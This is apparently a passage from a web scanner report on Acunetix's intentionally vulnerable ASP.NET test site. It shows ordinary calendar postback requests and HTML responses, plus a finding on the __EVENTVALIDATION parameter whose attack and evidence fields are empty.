Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1119 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,119 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8122&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgDA%2BeZNENoIZGRk6LMHX3qUNdDnClcTYGuClE%2FVdUo%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLBzZTVCwKg3Pm8DwK646%2FsDgKN99zPDAKN99zPDAKN9%2FDiBQKN9%2FDiBQKN9%2BS5DQKN9%2BS5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3%2FwwwC5p3%2FwwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC%2B6TtxQ8C%2B6TtxQ8C%2B6SBmAcC%2B6SBmAcC%2B6S1PwL7pLU%2FAvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8%2BgFAtzL8%2BgFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj%2FkPAtzLj%2FkPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy%2F%2FqAgLcy%2F%2FqAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDBaaIqa8aOuGGMkDxjCADekX4H5V
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:46:03 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgDA+eZNENoIZGRk6LMHX3qUNdDnClcTYGuClE/VdUo=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLBzZTVCwKg3Pm8DwK646/sDgKN99zPDAKN99zPDAKN9/DiBQKN9/DiBQKN9+S5DQKN9+S5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3/wwwC5p3/wwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC+6TtxQ8C+6TtxQ8C+6SBmAcC+6SBmAcC+6S1PwL7pLU/AvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8+gFAtzL8+gFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj/kPAtzLj/kPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy//qAgLcy//qAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDBaaIqa8aOuGGMkDxjCADekX4H5V" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:White" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:Black" title="April 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:Black" title="April 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:Black" title="April 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:Black" title="April 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:Black" title="April 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:Black" title="April 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1183 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,183 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8283&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgCAe5PRjtoIZGRk6EH0s2Z8ka%2BzM%2BHMwle2HsYRUt4%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLC4fnwBQLtiZ78CwLHkIz%2BDgKK%2BZ%2FNDAKK%2BZ%2FNDAKK%2BbPgBQKK%2BbPgBQKK%2BaeHDQKK%2BaeHDQKK%2BZvsCwKK%2BZvsCwKK%2BY%2BDAwKK%2BY%2BDAwK%2Fk%2FvECQK%2Fk%2FvECQK%2Fk%2B%2BbAQK%2Fk%2B%2BbAQK%2Fk4O%2BCgK%2Fk4O%2BCgK%2Fk7fVAwK%2Fk7fVAwK%2Fk6voDAK%2Fk6voDAK%2Fk9%2BMBAK%2Fk9%2BMBAK%2Fk%2FOjDQK%2Fk%2FOjDQK%2Fk%2BfGBgK%2Fk%2BfGBgK%2Fk9uvAwK%2Fk9uvAwK%2Fk8%2FCDAK%2Fk8%2FCDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV%2BAkCkLqV%2BAkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAtfo7qqaH3H0sjFNlbLFb1KND5Fx
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:00:17 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgCAe5PRjtoIZGRk6EH0s2Z8ka+zM+HMwle2HsYRUt4=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLC4fnwBQLtiZ78CwLHkIz+DgKK+Z/NDAKK+Z/NDAKK+bPgBQKK+bPgBQKK+aeHDQKK+aeHDQKK+ZvsCwKK+ZvsCwKK+Y+DAwKK+Y+DAwK/k/vECQK/k/vECQK/k++bAQK/k++bAQK/k4O+CgK/k4O+CgK/k7fVAwK/k7fVAwK/k6voDAK/k6voDAK/k9+MBAK/k9+MBAK/k/OjDQK/k/OjDQK/k+fGBgK/k+fGBgK/k9uvAwK/k9uvAwK/k8/CDAK/k8/CDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV+AkCkLqV+AkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAtfo7qqaH3H0sjFNlbLFb1KND5Fx" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:White" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their 